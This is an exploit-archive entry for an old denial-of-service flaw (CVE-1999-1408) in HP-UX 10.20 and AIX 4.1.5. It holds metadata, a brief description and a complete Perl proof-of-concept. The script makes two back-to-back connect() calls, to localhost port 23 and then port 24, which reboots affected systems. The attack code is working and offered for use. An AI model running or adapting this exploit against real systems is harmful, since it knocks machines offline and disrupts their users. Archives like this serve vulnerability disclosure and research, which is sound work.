HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service

Author: Cahya Wirawan
type: dos
platform: hp-ux
port: 
date_added: 1997-03-05  
date_updated: 2012-06-18  
verified: 1  
codes: CVE-1999-1408;OSVDB-8022  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19278.pl  
source: https://www.securityfocus.com/bid/352/info


Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter.

#!/usr/local/bin/perl5
use Socket;

socket (SOCK,AF_INET,SOCK_STREAM,0);
$iaddr = inet_aton('localhost');
$paddr = sockaddr_in('23',$iaddr);
connect SOCK,$paddr;
shutdown SOCK,2;
$paddr = sockaddr_in('24',$iaddr);
connect SOCK,$paddr;